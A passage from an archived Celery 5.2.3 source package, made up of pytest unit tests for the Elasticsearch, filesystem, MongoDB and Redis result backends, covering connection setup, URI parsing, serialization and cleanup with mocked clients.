sentinel.task_id, '_source': {'result': sentinel.result} } x._server.index.return_value = expected_result body = {b"field1": "value1"} x._index( id=str(sentinel.task_id).encode(), body=body, kwarg1='test1' ) x._server.index.assert_called_once_with( id=str(sentinel.task_id), doc_type=x.doc_type, index=x.index, body={"field1": "value1"}, params={'op_type': 'create'}, kwarg1='test1' ) def test_encode_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta({'solution': 42}, states.SUCCESS, None, None) assert x.encode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_encode_none_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta(None, states.SUCCESS, None, None) assert x.encode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_encode_exception_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) try: raise Exception("failed") except Exception as exc: einfo = ExceptionInfo() result_meta = x._get_result_meta( x.encode_result(exc, states.FAILURE), states.FAILURE, einfo.traceback, None, ) assert x.encode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_from_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta({'solution': 42}, states.SUCCESS, None, None) result_meta['result'] = x._encode(result_meta['result'])[2] assert x.decode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_none_from_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta(None, states.SUCCESS, None, None) # result_meta['result'] = x._encode(result_meta['result'])[2] assert x.decode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_encoded_from_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta({'solution': 42}, states.SUCCESS, None, None) assert x.decode(x.encode(result_meta)) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_encoded_exception_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) try: raise Exception("failed") except Exception as exc: einfo = ExceptionInfo() result_meta = x._get_result_meta( x.encode_result(exc, states.FAILURE), states.FAILURE, einfo.traceback, None, ) assert x.decode(x.encode(result_meta)) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev @patch("celery.backends.base.KeyValueStoreBackend.decode") def test_decode_not_dict(self, kv_decode_mock): self.app.conf.elasticsearch_save_meta_as_text, prev = False, 
self.app.conf.elasticsearch_save_meta_as_text try: kv_decode_mock.return_value = sentinel.decoded x = ElasticsearchBackend(app=self.app) assert x.decode(sentinel.encoded) == sentinel.decoded kv_decode_mock.assert_called_once() finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_config_params(self): self.app.conf.elasticsearch_max_retries = 10 self.app.conf.elasticsearch_timeout = 20.0 self.app.conf.elasticsearch_retry_on_timeout = True self.backend = ElasticsearchBackend(app=self.app) assert self.backend.es_max_retries == 10 assert self.backend.es_timeout == 20.0 assert self.backend.es_retry_on_timeout is True def test_lazy_server_init(self): x = ElasticsearchBackend(app=self.app) x._get_server = Mock() x._get_server.return_value = sentinel.server assert x.server == sentinel.server x._get_server.assert_called_once() def test_mget(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get.side_effect = [ {'found': True, '_id': sentinel.task_id1, '_source': {'result': sentinel.result1}}, {'found': True, '_id': sentinel.task_id2, '_source': {'result': sentinel.result2}}, ] assert x.mget([sentinel.task_id1, sentinel.task_id2]) == [sentinel.result1, sentinel.result2] x._server.get.assert_has_calls([ call(index=x.index, doc_type=x.doc_type, id=sentinel.task_id1), call(index=x.index, doc_type=x.doc_type, id=sentinel.task_id2), ]) def test_exception_safe_to_retry(self): x = ElasticsearchBackend(app=self.app) assert not x.exception_safe_to_retry(Exception("failed")) assert not x.exception_safe_to_retry(BaseException("failed")) assert x.exception_safe_to_retry(exceptions.ConflictError(409, "concurrent update", {})) assert x.exception_safe_to_retry(exceptions.ConnectionError(503, "service unavailable", {})) assert x.exception_safe_to_retry(exceptions.TransportError(429, "too many requests", {})) assert not x.exception_safe_to_retry(exceptions.NotFoundError(404, "not found", {})) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_filesystem.py0000664000175000017500000001051400000000000021467 0ustar00asifasif00000000000000import os import pickle import sys import tempfile import time from unittest.mock import patch import pytest import t.skip from celery import states, uuid from celery.backends import filesystem from celery.backends.filesystem import FilesystemBackend from celery.exceptions import ImproperlyConfigured @t.skip.if_win32 class test_FilesystemBackend: def setup(self): self.directory = tempfile.mkdtemp() self.url = 'file://' + self.directory self.path = self.directory.encode('ascii') def test_a_path_is_required(self): with pytest.raises(ImproperlyConfigured): FilesystemBackend(app=self.app) def test_a_path_in_url(self): tb = FilesystemBackend(app=self.app, url=self.url) assert tb.path == self.path @pytest.mark.parametrize("url,expected_error_message", [ ('file:///non-existing', filesystem.E_PATH_INVALID), ('url://non-conforming', filesystem.E_PATH_NON_CONFORMING_SCHEME), (None, filesystem.E_NO_PATH_SET) ]) def test_raises_meaningful_errors_for_invalid_urls( self, url, expected_error_message ): with pytest.raises( ImproperlyConfigured, match=expected_error_message ): FilesystemBackend(app=self.app, url=url) def test_localhost_is_removed_from_url(self): url = 'file://localhost' + self.directory tb = FilesystemBackend(app=self.app, url=url) assert tb.path == self.path def test_missing_task_is_PENDING(self): tb = FilesystemBackend(app=self.app, url=self.url) assert 
tb.get_state('xxx-does-not-exist') == states.PENDING def test_mark_as_done_writes_file(self): tb = FilesystemBackend(app=self.app, url=self.url) tb.mark_as_done(uuid(), 42) assert len(os.listdir(self.directory)) == 1 def test_done_task_is_SUCCESS(self): tb = FilesystemBackend(app=self.app, url=self.url) tid = uuid() tb.mark_as_done(tid, 42) assert tb.get_state(tid) == states.SUCCESS def test_correct_result(self): data = {'foo': 'bar'} tb = FilesystemBackend(app=self.app, url=self.url) tid = uuid() tb.mark_as_done(tid, data) assert tb.get_result(tid) == data def test_get_many(self): data = {uuid(): 'foo', uuid(): 'bar', uuid(): 'baz'} tb = FilesystemBackend(app=self.app, url=self.url) for key, value in data.items(): tb.mark_as_done(key, value) for key, result in tb.get_many(data.keys()): assert result['result'] == data[key] def test_forget_deletes_file(self): tb = FilesystemBackend(app=self.app, url=self.url) tid = uuid() tb.mark_as_done(tid, 42) tb.forget(tid) assert len(os.listdir(self.directory)) == 0 @pytest.mark.usefixtures('depends_on_current_app') def test_pickleable(self): tb = FilesystemBackend(app=self.app, url=self.url, serializer='pickle') assert pickle.loads(pickle.dumps(tb)) @pytest.mark.skipif(sys.platform == 'win32', reason='Test can fail on ' 'Windows/FAT due to low granularity of st_mtime') def test_cleanup(self): tb = FilesystemBackend(app=self.app, url=self.url) yesterday_task_ids = [uuid() for i in range(10)] today_task_ids = [uuid() for i in range(10)] for tid in yesterday_task_ids: tb.mark_as_done(tid, 42) day_length = 0.2 time.sleep(day_length) # let FS mark some difference in mtimes for tid in today_task_ids: tb.mark_as_done(tid, 42) with patch.object(tb, 'expires', 0): tb.cleanup() # test that zero expiration time prevents any cleanup filenames = set(os.listdir(tb.path)) assert all( tb.get_key_for_task(tid) in filenames for tid in yesterday_task_ids + today_task_ids ) # test that non-zero expiration time enables cleanup by file mtime with patch.object(tb, 'expires', day_length): tb.cleanup() filenames = set(os.listdir(tb.path)) assert not any( tb.get_key_for_task(tid) in filenames for tid in yesterday_task_ids ) assert all( tb.get_key_for_task(tid) in filenames for tid in today_task_ids ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/backends/test_mongodb.py0000664000175000017500000006707500000000000020746 0ustar00asifasif00000000000000import datetime from pickle import dumps, loads from unittest.mock import ANY, MagicMock, Mock, patch, sentinel import dns.version import pymongo import pytest import pytz from kombu.exceptions import EncodeError try: from pymongo.errors import ConfigurationError except ImportError: ConfigurationError = None from celery import states, uuid from celery.backends.mongodb import Binary, InvalidDocument, MongoBackend from celery.exceptions import ImproperlyConfigured from t.unit import conftest COLLECTION = 'taskmeta_celery' TASK_ID = uuid() MONGODB_HOST = 'localhost' MONGODB_PORT = 27017 MONGODB_USER = 'mongo' MONGODB_PASSWORD = '1234' MONGODB_DATABASE = 'testing' MONGODB_COLLECTION = 'collection1' MONGODB_GROUP_COLLECTION = 'group_collection1' # uri with user, password, database name, replica set, DNS seedlist format MONGODB_SEEDLIST_URI = ('srv://' 'celeryuser:celerypassword@' 'dns-seedlist-host.example.com/' 'celerydatabase') MONGODB_BACKEND_HOST = [ 'mongo1.example.com:27017', 'mongo2.example.com:27017', 'mongo3.example.com:27017', ] CELERY_USER = 
'celeryuser' CELERY_PASSWORD = 'celerypassword' CELERY_DATABASE = 'celerydatabase' pytest.importorskip('pymongo') def fake_resolver_dnspython(): TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs): if rdtype == 'SRV': return [ SRV(0, 0, 0, 0, 27017, hostname) for hostname in [ 'mongo1.example.com', 'mongo2.example.com', 'mongo3.example.com' ] ] elif rdtype == 'TXT': return [TXT(0, 0, [b'replicaSet=rs0'])] return mock_resolver class test_MongoBackend: default_url = 'mongodb://uuuu:pwpw@hostname.dom/database' replica_set_url = ( 'mongodb://uuuu:pwpw@hostname.dom,' 'hostname.dom/database?replicaSet=rs' ) sanitized_default_url = 'mongodb://uuuu:**@hostname.dom/database' sanitized_replica_set_url = ( 'mongodb://uuuu:**@hostname.dom/,' 'hostname.dom/database?replicaSet=rs' ) def setup(self): self.patching('celery.backends.mongodb.MongoBackend.encode') self.patching('celery.backends.mongodb.MongoBackend.decode') self.patching('celery.backends.mongodb.Binary') self.backend = MongoBackend(app=self.app, url=self.default_url) def test_init_no_mongodb(self, patching): patching('celery.backends.mongodb.pymongo', None) with pytest.raises(ImproperlyConfigured): MongoBackend(app=self.app) def test_init_no_settings(self): self.app.conf.mongodb_backend_settings = [] with pytest.raises(ImproperlyConfigured): MongoBackend(app=self.app) def test_init_settings_is_None(self): self.app.conf.mongodb_backend_settings = None MongoBackend(app=self.app) def test_init_with_settings(self): self.app.conf.mongodb_backend_settings = None # empty settings mb = MongoBackend(app=self.app) # uri uri = 'mongodb://localhost:27017' mb = MongoBackend(app=self.app, url=uri) assert mb.mongo_host == ['localhost:27017'] assert mb.options == mb._prepare_client_options() assert mb.database_name == 'celery' # uri with database name uri = 'mongodb://localhost:27017/celerydb' mb = MongoBackend(app=self.app, url=uri) assert mb.database_name == 'celerydb' # uri with user, password, database name, replica set uri = ('mongodb://' 'celeryuser:celerypassword@' 'mongo1.example.com:27017,' 'mongo2.example.com:27017,' 'mongo3.example.com:27017/' 'celerydatabase?replicaSet=rs0') mb = MongoBackend(app=self.app, url=uri) assert mb.mongo_host == MONGODB_BACKEND_HOST assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', ) assert mb.user == CELERY_USER assert mb.password == CELERY_PASSWORD assert mb.database_name == CELERY_DATABASE # same uri, change some parameters in backend settings self.app.conf.mongodb_backend_settings = { 'replicaset': 'rs1', 'user': 'backenduser', 'database': 'another_db', 'options': { 'socketKeepAlive': True, }, } mb = MongoBackend(app=self.app, url=uri) assert mb.mongo_host == MONGODB_BACKEND_HOST assert mb.options == dict( mb._prepare_client_options(), replicaset='rs1', socketKeepAlive=True, ) assert mb.user == 'backenduser' assert mb.password == CELERY_PASSWORD assert mb.database_name == 'another_db' mb = MongoBackend(app=self.app, url='mongodb://') @pytest.mark.skipif(dns.version.MAJOR > 1, reason="For dnspython version > 1, pymongo's" "srv_resolver calls resolver.resolve") @pytest.mark.skipif(pymongo.version_tuple[0] > 3, reason="For pymongo version > 3, options returns ssl") def test_init_mongodb_dnspython1_pymongo3_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.query', side_effect=resolver): mb = 
self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', ssl=True ) @pytest.mark.skipif(dns.version.MAJOR <= 1, reason="For dnspython versions 1.X, pymongo's" "srv_resolver calls resolver.query") @pytest.mark.skipif(pymongo.version_tuple[0] > 3, reason="For pymongo version > 3, options returns ssl") def test_init_mongodb_dnspython2_pymongo3_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.resolve', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', ssl=True ) @pytest.mark.skipif(dns.version.MAJOR > 1, reason="For dnspython version >= 2, pymongo's" "srv_resolver calls resolver.resolve") @pytest.mark.skipif(pymongo.version_tuple[0] <= 3, reason="For pymongo version > 3, options returns tls") def test_init_mongodb_dnspython1_pymongo4_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.query', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', tls=True ) @pytest.mark.skipif(dns.version.MAJOR <= 1, reason="For dnspython versions 1.X, pymongo's" "srv_resolver calls resolver.query") @pytest.mark.skipif(pymongo.version_tuple[0] <= 3, reason="For pymongo version > 3, options returns tls") def test_init_mongodb_dnspython2_pymongo4_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.resolve', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', tls=True ) def perform_seedlist_assertions(self): mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI) assert mb.mongo_host == MONGODB_BACKEND_HOST assert mb.user == CELERY_USER assert mb.password == CELERY_PASSWORD assert mb.database_name == CELERY_DATABASE return mb def test_ensure_mongodb_uri_compliance(self): mb = MongoBackend(app=self.app, url=None) compliant_uri = mb._ensure_mongodb_uri_compliance assert compliant_uri('mongodb://') == 'mongodb://localhost' assert compliant_uri('mongodb+something://host') == \ 'mongodb+something://host' assert compliant_uri('something://host') == 'mongodb+something://host' @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): x = MongoBackend(app=self.app) assert loads(dumps(x)) def test_get_connection_connection_exists(self): with patch('pymongo.MongoClient') as mock_Connection: self.backend._connection = sentinel._connection connection = self.backend._get_connection() assert sentinel._connection == connection mock_Connection.assert_not_called() def test_get_connection_no_connection_host(self): with patch('pymongo.MongoClient') as mock_Connection: self.backend._connection = None self.backend.host = MONGODB_HOST self.backend.port = MONGODB_PORT mock_Connection.return_value = sentinel.connection connection = self.backend._get_connection() mock_Connection.assert_called_once_with( host='mongodb://localhost:27017', **self.backend._prepare_client_options() ) assert sentinel.connection == connection def test_get_connection_no_connection_mongodb_uri(self): with patch('pymongo.MongoClient') as mock_Connection: mongodb_uri = 'mongodb://%s:%d' % (MONGODB_HOST, MONGODB_PORT) self.backend._connection = None self.backend.host = mongodb_uri mock_Connection.return_value = sentinel.connection 
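# backend.host has been set to a complete mongodb:// URI above, so
# _get_connection() should hand it to MongoClient unchanged (no host/port
# reassembly), which the assert_called_once_with below verifies.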
connection = self.backend._get_connection() mock_Connection.assert_called_once_with( host=mongodb_uri, **self.backend._prepare_client_options() ) assert sentinel.connection == connection def test_get_connection_with_authmechanism(self): with patch('pymongo.MongoClient') as mock_Connection: self.app.conf.mongodb_backend_settings = None uri = ('mongodb://' 'celeryuser:celerypassword@' 'localhost:27017/' 'celerydatabase?authMechanism=SCRAM-SHA-256') mb = MongoBackend(app=self.app, url=uri) mock_Connection.return_value = sentinel.connection connection = mb._get_connection() mock_Connection.assert_called_once_with( host=['localhost:27017'], username=CELERY_USER, password=CELERY_PASSWORD, authmechanism='SCRAM-SHA-256', **mb._prepare_client_options() ) assert sentinel.connection == connection def test_get_connection_with_authmechanism_no_username(self): with patch('pymongo.MongoClient') as mock_Connection: self.app.conf.mongodb_backend_settings = None uri = ('mongodb://' 'localhost:27017/' 'celerydatabase?authMechanism=SCRAM-SHA-256') mb = MongoBackend(app=self.app, url=uri) mock_Connection.side_effect = ConfigurationError( 'SCRAM-SHA-256 requires a username.') with pytest.raises(ConfigurationError): mb._get_connection() mock_Connection.assert_called_once_with( host=['localhost:27017'], authmechanism='SCRAM-SHA-256', **mb._prepare_client_options() ) @patch('celery.backends.mongodb.MongoBackend._get_connection') def test_get_database_no_existing(self, mock_get_connection): # Should really check for combinations of these two, to be complete. self.backend.user = MONGODB_USER self.backend.password = MONGODB_PASSWORD mock_database = Mock() mock_connection = MagicMock(spec=['__getitem__']) mock_connection.__getitem__.return_value = mock_database mock_get_connection.return_value = mock_connection database = self.backend.database assert database is mock_database assert self.backend.__dict__['database'] is mock_database @patch('celery.backends.mongodb.MongoBackend._get_connection') def test_get_database_no_existing_no_auth(self, mock_get_connection): # Should really check for combinations of these two, to be complete. 
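# With no credentials configured, the database property should still resolve
# via the mocked connection and be cached on the backend instance, mirroring
# the authenticated variant above.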
self.backend.user = None self.backend.password = None mock_database = Mock() mock_connection = MagicMock(spec=['__getitem__']) mock_connection.__getitem__.return_value = mock_database mock_get_connection.return_value = mock_connection database = self.backend.database assert database is mock_database assert self.backend.__dict__['database'] is mock_database @patch('celery.backends.mongodb.MongoBackend._get_database') def test_store_result(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) mock_collection.replace_one.assert_called_once_with(ANY, ANY, upsert=True) assert sentinel.result == ret_val mock_collection.replace_one.side_effect = InvalidDocument() with pytest.raises(EncodeError): self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_store_result_with_request(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_request = MagicMock(spec=['parent_id']) mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection mock_request.parent_id = sentinel.parent_id ret_val = self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status, request=mock_request) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) parameters = mock_collection.replace_one.call_args[0][1] assert parameters['parent_id'] == sentinel.parent_id assert sentinel.result == ret_val mock_collection.replace_one.side_effect = InvalidDocument() with pytest.raises(EncodeError): self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_get_task_meta_for(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_collection.find_one.return_value = MagicMock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._get_task_meta_for(sentinel.task_id) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) assert list(sorted([ 'status', 'task_id', 'date_done', 'traceback', 'result', 'children', ])) == list(sorted(ret_val.keys())) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_get_task_meta_for_no_result(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_collection.find_one.return_value = None mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._get_task_meta_for(sentinel.task_id) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) assert {'status': states.PENDING, 'result': None} == 
ret_val @patch('celery.backends.mongodb.MongoBackend._get_database') def test_save_group(self, mock_get_database): self.backend.groupmeta_collection = MONGODB_GROUP_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection res = [self.app.AsyncResult(i) for i in range(3)] ret_val = self.backend._save_group( sentinel.taskset_id, res, ) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with( MONGODB_GROUP_COLLECTION, ) mock_collection.replace_one.assert_called_once_with(ANY, ANY, upsert=True) assert res == ret_val @patch('celery.backends.mongodb.MongoBackend._get_database') def test_restore_group(self, mock_get_database): self.backend.groupmeta_collection = MONGODB_GROUP_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_collection.find_one.return_value = { '_id': sentinel.taskset_id, 'result': [uuid(), uuid()], 'date_done': 1, } self.backend.decode.side_effect = lambda r: r mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._restore_group(sentinel.taskset_id) mock_get_database.assert_called_once_with() mock_collection.find_one.assert_called_once_with( {'_id': sentinel.taskset_id}) assert (sorted(['date_done', 'result', 'task_id']) == sorted(list(ret_val.keys()))) mock_collection.find_one.return_value = None self.backend._restore_group(sentinel.taskset_id) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_delete_group(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection self.backend._delete_group(sentinel.taskset_id) mock_get_database.assert_called_once_with() mock_collection.delete_one.assert_called_once_with( {'_id': sentinel.taskset_id}) @patch('celery.backends.mongodb.MongoBackend._get_database') def test__forget(self, mock_get_database): # note: here tested _forget method, not forget method self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection self.backend._forget(sentinel.task_id) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with( MONGODB_COLLECTION) mock_collection.delete_one.assert_called_once_with( {'_id': sentinel.task_id}) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_cleanup(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION self.backend.groupmeta_collection = MONGODB_GROUP_COLLECTION mock_database = Mock(spec=['__getitem__', '__setitem__'], name='MD') self.backend.collections = mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__ = Mock(name='MD.__getitem__') mock_database.__getitem__.return_value = mock_collection self.backend.app.now = datetime.datetime.utcnow self.backend.cleanup() mock_get_database.assert_called_once_with() mock_collection.delete_many.assert_called() self.backend.collections = mock_collection = Mock() self.backend.expires = None self.backend.cleanup() 
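# With expires set to None, cleanup() is expected to be a no-op: the freshly
# replaced mock collection must not see any delete_many() call, as asserted
# next.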
        mock_collection.delete_many.assert_not_called()

    def test_prepare_client_options(self):
        with patch('pymongo.version_tuple', new=(3, 0, 3)):
            options = self.backend._prepare_client_options()
            assert options == {
                'maxPoolSize': self.backend.max_pool_size
            }

    def test_as_uri_include_password(self):
        assert self.backend.as_uri(True) == self.default_url

    def test_as_uri_exclude_password(self):
        assert self.backend.as_uri() == self.sanitized_default_url

    def test_as_uri_include_password_replica_set(self):
        backend = MongoBackend(app=self.app, url=self.replica_set_url)
        assert backend.as_uri(True) == self.replica_set_url

    def test_as_uri_exclude_password_replica_set(self):
        backend = MongoBackend(app=self.app, url=self.replica_set_url)
        assert backend.as_uri() == self.sanitized_replica_set_url

    def test_regression_worker_startup_info(self):
        self.app.conf.result_backend = (
            'mongodb://user:password@host0.com:43437,host1.com:43437'
            '/work4us?replicaSet=rs&ssl=true'
        )
        worker = self.app.Worker()
        with conftest.stdouts():
            worker.on_start()
        assert worker.startup_info()


@pytest.fixture(scope="function")
def mongo_backend_factory(app):
    """Return a factory that creates a MongoBackend instance with the given
    serializer, including BSON."""

    def create_mongo_backend(serializer):
        # NOTE: `bson` is a MongoDB-specific serializer and can only be set
        # directly on the MongoBackend instance.
        if serializer == "bson":
            backend = MongoBackend(app=app)
            backend.serializer = serializer
        else:
            app.conf.accept_content = ['json', 'pickle', 'msgpack', 'yaml']
            app.conf.result_serializer = serializer
            backend = MongoBackend(app=app)
        return backend

    yield create_mongo_backend


@pytest.mark.parametrize("serializer,encoded_into", [
    ('bson', int),
    ('json', str),
    ('pickle', Binary),
    ('msgpack', Binary),
    ('yaml', str),
])
class test_MongoBackend_no_mock:

    def test_encode(self, mongo_backend_factory, serializer, encoded_into):
        backend = mongo_backend_factory(serializer=serializer)
        assert isinstance(backend.encode(10), encoded_into)

    def test_encode_decode(self, mongo_backend_factory, serializer,
                           encoded_into):
        backend = mongo_backend_factory(serializer=serializer)
        decoded = backend.decode(backend.encode(12))
        assert decoded == 12


class _MyTestClass:

    def __init__(self, a):
        self.a = a

    def __eq__(self, other):
        assert self.__class__ == type(other)
        return self.a == other.a


SUCCESS_RESULT_TEST_DATA = [
    # json types
    {
        "result": "A simple string",
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    {
        "result": 100,
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    {
        "result": 9.1999999999999999,
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    {
        "result": {"foo": "simple result"},
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    {
        "result": ["a", "b"],
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    {
        "result": False,
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    {
        "result": None,
        "serializers": ["bson", "pickle", "yaml", "json", "msgpack"],
    },
    # advanced essential types
    {
        "result": datetime.datetime(2000, 1, 1, 0, 0, 0, 0),
        "serializers": ["bson", "pickle", "yaml"],
    },
    {
        "result": datetime.datetime(2000, 1, 1, 0, 0, 0, 0, tzinfo=pytz.utc),
        "serializers": ["pickle", "yaml"],
    },
    # custom types
    {
        "result": _MyTestClass("Hi!"),
        "serializers": ["pickle"],
    },
]


class test_MongoBackend_store_get_result:

    @pytest.fixture(scope="function", autouse=True)
    def fake_mongo_collection_patch(self, monkeypatch):
        """A fake collection whose serialization behaviour is close to
        MongoDB's."""
        bson =
pytest.importorskip("bson") class FakeMongoCollection: def __init__(self): self.data = {} def replace_one(self, task_id, meta, upsert=True): self.data[task_id['_id']] = bson.encode(meta) def find_one(self, task_id): return bson.decode(self.data[task_id['_id']]) monkeypatch.setattr(MongoBackend, "collection", FakeMongoCollection()) @pytest.mark.parametrize("serializer,result_type,result", [ (s, type(i['result']), i['result']) for i in SUCCESS_RESULT_TEST_DATA for s in i['serializers']] ) def test_encode_success_results(self, mongo_backend_factory, serializer, result_type, result): backend = mongo_backend_factory(serializer=serializer) backend.store_result(TASK_ID, result, 'SUCCESS') recovered = backend.get_result(TASK_ID) assert type(recovered) == result_type assert recovered == result @pytest.mark.parametrize("serializer", ["bson", "pickle", "yaml", "json", "msgpack"]) def test_encode_chain_results(self, mongo_backend_factory, serializer): backend = mongo_backend_factory(serializer=serializer) mock_request = MagicMock(spec=['children']) children = [self.app.AsyncResult(uuid()) for i in range(10)] mock_request.children = children backend.store_result(TASK_ID, 0, 'SUCCESS', request=mock_request) recovered = backend.get_children(TASK_ID) def tuple_to_list(t): return [list(t[0]), t[1]] assert recovered == [tuple_to_list(c.as_tuple()) for c in children] @pytest.mark.parametrize("serializer", ["bson", "pickle", "yaml", "json", "msgpack"]) def test_encode_exception_error_results(self, mongo_backend_factory, serializer): backend = mongo_backend_factory(serializer=serializer) exception = Exception("Basic Exception") traceback = 'Traceback:\n Exception: Basic Exception\n' backend.store_result(TASK_ID, exception, 'FAILURE', traceback) recovered = backend.get_result(TASK_ID) assert type(recovered) == type(exception) assert recovered.args == exception.args ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_redis.py0000664000175000017500000014000000000000000020403 0ustar00asifasif00000000000000import itertools import json import random import ssl from contextlib import contextmanager from datetime import timedelta from pickle import dumps, loads from unittest.mock import ANY, Mock, call, patch import pytest from celery import signature, states, uuid from celery.canvas import Signature from celery.contrib.testing.mocks import ContextMock from celery.exceptions import (BackendStoreError, ChordError, ImproperlyConfigured) from celery.result import AsyncResult, GroupResult from celery.utils.collections import AttributeDict from t.unit import conftest def raise_on_second_call(mock, exc, *retval): def on_first_call(*args, **kwargs): mock.side_effect = exc return mock.return_value mock.side_effect = on_first_call if retval: mock.return_value, = retval class ConnectionError(Exception): pass class Connection: connected = True def disconnect(self): self.connected = False class Pipeline: def __init__(self, client): self.client = client self.steps = [] def __getattr__(self, attr): def add_step(*args, **kwargs): self.steps.append((getattr(self.client, attr), args, kwargs)) return self return add_step def __enter__(self): return self def __exit__(self, type, value, traceback): pass def execute(self): return [step(*a, **kw) for step, a, kw in self.steps] class PubSub(conftest.MockCallbacks): def __init__(self, ignore_subscribe_messages=False): self._subscribed_to = set() 